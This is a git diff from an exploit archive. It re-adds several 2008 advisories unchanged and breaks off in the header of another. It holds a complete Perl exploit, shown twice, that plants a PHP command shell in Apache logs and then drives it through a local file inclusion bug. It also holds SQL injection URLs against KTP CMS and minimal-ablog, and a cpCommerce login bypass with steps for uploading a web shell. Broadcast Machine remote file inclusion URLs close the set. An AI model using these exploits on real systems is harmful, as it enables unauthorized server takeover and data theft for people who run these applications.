-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use IO::Socket;
-use LWP::Simple;
-
-$log="../";
-@apache=(
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../.. /../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-
-my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
-
-print "\n==============================================\n";
-print "     KTP Computer Customer Database \n";
-print "    Remote Command Execution Exploit \n";
-print "      Discovered By CWH Underground \n";
-print "==============================================\n";
-print " \n";
-print " ,--^----------,--------,-----,-------^--, \n";
-print " | ||||||||| `--------' | O \n";
-print " `+---------------------------^----------| \n";
-print " `\_,-------, _________________________| \n";
-print " / XXXXXX /`| / \n";
-print " / XXXXXX / `\ / \n";
-print " / XXXXXX /\______( \n";
-print " / XXXXXX / \n";
-print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
-print " (________( \n";
-print " `------' \n";
-print " \n";
-
-
-
-if (@ARGV < 2)
-{
-    print "Usage: ./xpl.pl <Host> <Path>\n";
-	print "Ex. ./xpl.pl www.hackme.com /ktp\n";
-
-}
-
-$host=$ARGV[0];
-$path=$ARGV[1];
-
-
-if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}
-
-print "\nTrying to Inject the Code...\n";
-
-$CODE="<? passthru(\$_GET[cmd]) ?>";
-$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
-print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";
-print $socket "Host: ".$host."\r\n";
-print $socket "Connection: close\r\n\r\n";
-close($socket);
-
-if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}
-
- foreach $getlog(@apache)
-                {
-                  chomp($getlog);
-				  $find= $host.$path."/?p=".$getlog."%00";
-                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-				  $req = HTTP::Request->new(GET => $find);
-				  $res = $xpl->request($req);
-				  $info = $res->content;
-                  if($info =~ /cwhunderground/)
-                    {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
-                }
-
-
-my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
-
-chomp( $cmd = <STDIN> );
-
-while($cmd !~ "exit") {   
-   
-				  $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
-                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-				  $req = HTTP::Request->new(GET => $shell);
-				  $res = $xpl->request($req);
-				  $info = $res->content;
-				  print "\n$info";
-
-   
-    my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
-    chomp( $cmd = <STDIN> );   
-}
-
-# milw0rm.com [2008-11-30]
+#!/usr/bin/perl -w
+#======================================
+# KTPCCD Local File Inclusion Exploit
+#======================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#   `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 30 November 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : KTP Computer Customer Database CMS
+#VERSION : 1
+#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
+######################################################
+#Note: magic_quotes_gpc = off
+#Vulnerability in Local File Inclusion
+#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use IO::Socket;
+use LWP::Simple;
+
+$log="../";
+@apache=(
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../.. /../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+
+my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
+
+print "\n==============================================\n";
+print "     KTP Computer Customer Database \n";
+print "    Remote Command Execution Exploit \n";
+print "      Discovered By CWH Underground \n";
+print "==============================================\n";
+print " \n";
+print " ,--^----------,--------,-----,-------^--, \n";
+print " | ||||||||| `--------' | O \n";
+print " `+---------------------------^----------| \n";
+print " `\_,-------, _________________________| \n";
+print " / XXXXXX /`| / \n";
+print " / XXXXXX / `\ / \n";
+print " / XXXXXX /\______( \n";
+print " / XXXXXX / \n";
+print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+print " (________( \n";
+print " `------' \n";
+print " \n";
+
+
+
+if (@ARGV < 2)
+{
+    print "Usage: ./xpl.pl <Host> <Path>\n";
+	print "Ex. ./xpl.pl www.hackme.com /ktp\n";
+
+}
+
+$host=$ARGV[0];
+$path=$ARGV[1];
+
+
+if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}
+
+print "\nTrying to Inject the Code...\n";
+
+$CODE="<? passthru(\$_GET[cmd]) ?>";
+$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
+print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";
+print $socket "Host: ".$host."\r\n";
+print $socket "Connection: close\r\n\r\n";
+close($socket);
+
+if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}
+
+ foreach $getlog(@apache)
+                {
+                  chomp($getlog);
+				  $find= $host.$path."/?p=".$getlog."%00";
+                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+				  $req = HTTP::Request->new(GET => $find);
+				  $res = $xpl->request($req);
+				  $info = $res->content;
+                  if($info =~ /cwhunderground/)
+                    {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
+                }
+
+
+my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
+
+chomp( $cmd = <STDIN> );
+
+while($cmd !~ "exit") {   
+   
+				  $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
+                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+				  $req = HTTP::Request->new(GET => $shell);
+				  $res = $xpl->request($req);
+				  $info = $res->content;
+				  print "\n$info";
+
+   
+    my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
+    chomp( $cmd = <STDIN> );   
+}
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7305.txt b/platforms/php/webapps/7305.txt
index f27fc7907..7ad1a26b4 100755
--- a/platforms/php/webapps/7305.txt
+++ b/platforms/php/webapps/7305.txt
@@ -1,65 +1,65 @@
-================================================
-  KTPCCD CMS Blind SQL Injection Vulnerability
-================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 30 November 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : APPLICATION : KTP Computer Customer Database CMS
- VERSION     : 1
- DOWNLOAD    : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
-#####################################################
-
-**Need Magic_quote = Off**
-
---- Blind SQL Injection ---
-
-Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit...
-
----------
- Exploit
----------
-
-Test Blind SQL Injection in MYSQL Version 5
-
-[!]True
-[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--
-
-Result
-Home Phone: 122-131-3123
-Cell Phone: 123-123-3123
-Fax Number: 123-213-1321
-A+ Certifcation ID: 312 
-
-
-[!]False
-[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4--
-
-Result
-Home Phone: n/a
-Cell Phone: n/a
-Fax Number: n/a
-A+ Certifcation ID: (Technician is not certified) 
-
-#######################################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-# milw0rm.com [2008-11-30]
+================================================
+  KTPCCD CMS Blind SQL Injection Vulnerability
+================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 30 November 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : APPLICATION : KTP Computer Customer Database CMS
+ VERSION     : 1
+ DOWNLOAD    : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
+#####################################################
+
+**Need Magic_quote = Off**
+
+--- Blind SQL Injection ---
+
+Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit...
+
+---------
+ Exploit
+---------
+
+Test Blind SQL Injection in MYSQL Version 5
+
+[!]True
+[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--
+
+Result
+Home Phone: 122-131-3123
+Cell Phone: 123-123-3123
+Fax Number: 123-213-1321
+A+ Certifcation ID: 312 
+
+
+[!]False
+[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4--
+
+Result
+Home Phone: n/a
+Cell Phone: n/a
+Fax Number: n/a
+A+ Certifcation ID: (Technician is not certified) 
+
+#######################################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7306.txt b/platforms/php/webapps/7306.txt
index 697b3cdfb..f58f04785 100755
--- a/platforms/php/webapps/7306.txt
+++ b/platforms/php/webapps/7306.txt
@@ -1,56 +1,56 @@
-===========================================================================================================
-
-
-  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 
-
-       Software : minimal-ablog version 0.4
-       Vendor   : http://www.abweb.co.cc/
-       Download : http://code.google.com/p/minimal-ablog/downloads/list
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-===========================================================================================================
-
-
-  [o] Vulnerable file
-
-       index.php
-       admin/uploader.php
-
-
-
-  [o] Exploit
-
-       [ SQL Injection ]
-
-	    http://localhost/[path]/index.php?id=[SQL]
-	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo
-
-       [ File Upload ]
-
-	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
-	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here
-
-       [ Admin Bypass ]
-
-	    when you open admin/uploader.php to upload file you already have admin privs too :)
-
-
-===========================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-        
-===========================================================================================================
-
-# milw0rm.com [2008-11-30]
+===========================================================================================================
+
+
+  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 
+
+       Software : minimal-ablog version 0.4
+       Vendor   : http://www.abweb.co.cc/
+       Download : http://code.google.com/p/minimal-ablog/downloads/list
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+===========================================================================================================
+
+
+  [o] Vulnerable file
+
+       index.php
+       admin/uploader.php
+
+
+
+  [o] Exploit
+
+       [ SQL Injection ]
+
+	    http://localhost/[path]/index.php?id=[SQL]
+	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo
+
+       [ File Upload ]
+
+	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
+	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here
+
+       [ Admin Bypass ]
+
+	    when you open admin/uploader.php to upload file you already have admin privs too :)
+
+
+===========================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+        
+===========================================================================================================
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7308.txt b/platforms/php/webapps/7308.txt
index 6695ba11e..4ae6d0f3c 100755
--- a/platforms/php/webapps/7308.txt
+++ b/platforms/php/webapps/7308.txt
@@ -1,181 +1,181 @@
- Author:	girex
- Homepage:	girex.altervista.org
-
- CMS:		cpCommerce 1.2.6
- Site:		http://cpcommerce.cpradio.org/
-
- Bug: 		URL Rewrite -> Input variables overwrite
- PoC:		Auth bypass -> Shell upload
-
- Note:		Works regardless php.ini settings
-
- Vendor informed:		23/11/08
- cpCommerce 1.2.7 released: 	30/11/08 
- Public advisory:		30/11/08
-
--------------------------------------------------------------------------------------------------
-
- CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.
-
--------------------------------------------------------------------------------------------------
-
- Vulnerability discussion:
- cpCommerce sets register_globals to Off with ini_set
- and stores all GET and POST variables into $input array after have addslashed them.
-
- lines: 16-32
- file: /functions/sanitize_value.func.php 
-
-      function SanitizeInput()
-      {
-        $input = array();
-        if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
-        {
-          foreach ($_GET as $key => $val)
-          {
-            if (is_array($val))
-            {
-              $input[$key] = SanitizeArray($val);
-            }
-            else
-            {
-              $input[$key] = SanitizeValue($val);
-            }
-          }
-        }
-
-  ... and does the same for POST vars
-  
- lines: 3-13
-
-      function SanitizeValue($value)
-      {
-        if (!get_magic_quotes_gpc())
-        {
-          return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
-        }
-        else
-        {
-          return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
-        }
-      }
-
--------------------------------------------------------------------------------------------------
-  
- Let we see _funcions.php (the mainfile)
-
- lines: 128-132
- file: _functions.php
-
-      $input = array();
-      if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
-      {
-         $input = SanitizeInput();
-      }
-
-
- So, all GET and POST vars ar sanitized and stored into $input array.
- Let we procede in _functions.php...
-
--------------------------------------------------------------------------------------------------
-
- lines 156-173
- file: _functions.php
- 
-      if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
-      {
-        $rewriteValues = array();
-        if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
-        {
-          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
-        }
-        else
-        {
-          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
-        }
-     
-        for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
-        {
-          $input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
-        }
-      }
-
-
- $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page
-
- For example: GET http://localhost/index.php/helloword
- /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword
-
- As you can see from previous snipplet of code we can set $input content with
- GET index.php/key/value/
-
- So we can overwrite all inputs data in this cms, bypassing SanitazeInput()
- and the effect of magic_quotes 
- 
- How we'll exploit that....
-
--------------------------------------------------------------------------------------------------
- 
- lines: 13-20
- code: /actions/login.act.php
-
-      if (checkSession($input['email'], md5($input['password']))) {
-        $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
-        $return['url'] = urldecode("{$input['returnurl']}");
-      } else {
-
-        $_SESSION['loginerror'] = TRUE;
-        $return['url'] = urldecode("{$input['returnurl']}");
-      }
-
- If checkSession returns true we are logged in...
-
- lines: 3-9
- code: /functions/account_info.func.php
-
-      function checkSession($email,$pass) {
-        global $config, $db_chooser;
-
-         $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
-                           "email='$email' and pass='$pass'";
-
-         $accounts = $db_chooser->sql_query($sql['accounts']);
-
-
- We can manipulate this query having a SQL Injection with an auth bypass
- logging in with admin priviledges...
-
--------------------------------------------------------------------------------------------------
-
- If we set $input['email'] to: ' OR id_account=1#  with the trick of PATH_INFO (index.php/email/value)
- the resulting query will be:  select `id_account`, `level` from cpAccounts where email='' OR id_account=1
-
--------------------------------------------------------------------------------------------------
-
- PoC Auth Bypass:  
-
- GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php
-
--------------------------------------------------------------------------------------------------
-
--------------------------------------------------------------------------------------------------
-
- If you want to upload a shell:
-
-- Log in with the auth bypass PoC
-- Go to /[path]/admin/
-
-- Go to General Info -> Configuration
-- Add ,php in  What Image Extensions do you want to accept on Uploads?
-
-- Go to Product -> Create
-- Select a right category
-- Fill required fields
-- Upload your shell.php in Product Thumbnail Image
-- Save all
-
- Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php
-
--------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-30]
+ Author:	girex
+ Homepage:	girex.altervista.org
+
+ CMS:		cpCommerce 1.2.6
+ Site:		http://cpcommerce.cpradio.org/
+
+ Bug: 		URL Rewrite -> Input variables overwrite
+ PoC:		Auth bypass -> Shell upload
+
+ Note:		Works regardless php.ini settings
+
+ Vendor informed:		23/11/08
+ cpCommerce 1.2.7 released: 	30/11/08 
+ Public advisory:		30/11/08
+
+-------------------------------------------------------------------------------------------------
+
+ CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.
+
+-------------------------------------------------------------------------------------------------
+
+ Vulnerability discussion:
+ cpCommerce sets register_globals to Off with ini_set
+ and stores all GET and POST variables into $input array after have addslashed them.
+
+ lines: 16-32
+ file: /functions/sanitize_value.func.php 
+
+      function SanitizeInput()
+      {
+        $input = array();
+        if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
+        {
+          foreach ($_GET as $key => $val)
+          {
+            if (is_array($val))
+            {
+              $input[$key] = SanitizeArray($val);
+            }
+            else
+            {
+              $input[$key] = SanitizeValue($val);
+            }
+          }
+        }
+
+  ... and does the same for POST vars
+  
+ lines: 3-13
+
+      function SanitizeValue($value)
+      {
+        if (!get_magic_quotes_gpc())
+        {
+          return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
+        }
+        else
+        {
+          return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
+        }
+      }
+
+-------------------------------------------------------------------------------------------------
+  
+ Let we see _funcions.php (the mainfile)
+
+ lines: 128-132
+ file: _functions.php
+
+      $input = array();
+      if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
+      {
+         $input = SanitizeInput();
+      }
+
+
+ So, all GET and POST vars ar sanitized and stored into $input array.
+ Let we procede in _functions.php...
+
+-------------------------------------------------------------------------------------------------
+
+ lines 156-173
+ file: _functions.php
+ 
+      if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
+      {
+        $rewriteValues = array();
+        if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
+        {
+          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
+        }
+        else
+        {
+          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
+        }
+     
+        for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
+        {
+          $input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
+        }
+      }
+
+
+ $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page
+
+ For example: GET http://localhost/index.php/helloword
+ /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword
+
+ As you can see from previous snipplet of code we can set $input content with
+ GET index.php/key/value/
+
+ So we can overwrite all inputs data in this cms, bypassing SanitazeInput()
+ and the effect of magic_quotes 
+ 
+ How we'll exploit that....
+
+-------------------------------------------------------------------------------------------------
+ 
+ lines: 13-20
+ code: /actions/login.act.php
+
+      if (checkSession($input['email'], md5($input['password']))) {
+        $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
+        $return['url'] = urldecode("{$input['returnurl']}");
+      } else {
+
+        $_SESSION['loginerror'] = TRUE;
+        $return['url'] = urldecode("{$input['returnurl']}");
+      }
+
+ If checkSession returns true we are logged in...
+
+ lines: 3-9
+ code: /functions/account_info.func.php
+
+      function checkSession($email,$pass) {
+        global $config, $db_chooser;
+
+         $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
+                           "email='$email' and pass='$pass'";
+
+         $accounts = $db_chooser->sql_query($sql['accounts']);
+
+
+ We can manipulate this query having a SQL Injection with an auth bypass
+ logging in with admin priviledges...
+
+-------------------------------------------------------------------------------------------------
+
+ If we set $input['email'] to: ' OR id_account=1#  with the trick of PATH_INFO (index.php/email/value)
+ the resulting query will be:  select `id_account`, `level` from cpAccounts where email='' OR id_account=1
+
+-------------------------------------------------------------------------------------------------
+
+ PoC Auth Bypass:  
+
+ GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php
+
+-------------------------------------------------------------------------------------------------
+
+-------------------------------------------------------------------------------------------------
+
+ If you want to upload a shell:
+
+- Log in with the auth bypass PoC
+- Go to /[path]/admin/
+
+- Go to General Info -> Configuration
+- Add ,php in  What Image Extensions do you want to accept on Uploads?
+
+- Go to Product -> Create
+- Select a right category
+- Fill required fields
+- Upload your shell.php in Product Thumbnail Image
+- Save all
+
+ Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php
+
+-------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7310.txt b/platforms/php/webapps/7310.txt
index 30c489508..54a1a0f72 100755
--- a/platforms/php/webapps/7310.txt
+++ b/platforms/php/webapps/7310.txt
@@ -1,62 +1,62 @@
-=================================================================================================================
-
-
-  [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability
-
-       Software    : Broadcast Machine version 0.1
-       Vendor      : http://code.google.com/p/broadcastmachine/
-       View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
-       Author      : NoGe
-       Contact     : noge[dot]code[at]gmail[dot]com
-       Blog        : http://evilc0de.blogspot.com
-
-
-=================================================================================================================
-
-
-  [o] Vulnerable file
-
-       all file below is affected by "baseDir" parameter
-
-        controllers/MySQLController.php
-
-        controllers/SQLController.php
-
-        controllers/SetupController.php
-
-        controllers/VideoController.php
-
-        controllers/ViewController.php
-
-
-
-  [o] Exploit
-
-
-       http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]
-
-       http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]
-
-       http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]
-
-       http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]
-
-       http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]
-
-
-=================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-        
-=================================================================================================================
-
-# milw0rm.com [2008-11-30]
+=================================================================================================================
+
+
+  [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability
+
+       Software    : Broadcast Machine version 0.1
+       Vendor      : http://code.google.com/p/broadcastmachine/
+       View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
+       Author      : NoGe
+       Contact     : noge[dot]code[at]gmail[dot]com
+       Blog        : http://evilc0de.blogspot.com
+
+
+=================================================================================================================
+
+
+  [o] Vulnerable file
+
+       all file below is affected by "baseDir" parameter
+
+        controllers/MySQLController.php
+
+        controllers/SQLController.php
+
+        controllers/SetupController.php
+
+        controllers/VideoController.php
+
+        controllers/ViewController.php
+
+
+
+  [o] Exploit
+
+
+       http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]
+
+       http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]
+
+       http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]
+
+       http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]
+
+       http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]
+
+
+=================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+        
+=================================================================================================================
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7311.txt b/platforms/php/webapps/7311.txt
index edde0b48a..13c6abeac 100755
--- a/platforms/php/webapps/7311.txt
+++ b/platforms/php/webapps/7311.txt
@@ -1,39 +1,39 @@
--------------------------------------------------------------------------
-  --          JIKO FroM No-exploit.Com        ---
--------------------------------------------------------------------------
-# Author  : jiko
-# email  : jalikom@hotmail.com
-# Home   : www.no-exploit.Com
-# Script  : z1exchange-->http://1scripts.net/scripts/z1exchange.zip
- Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM  , WwW.Exploiter5.CoM
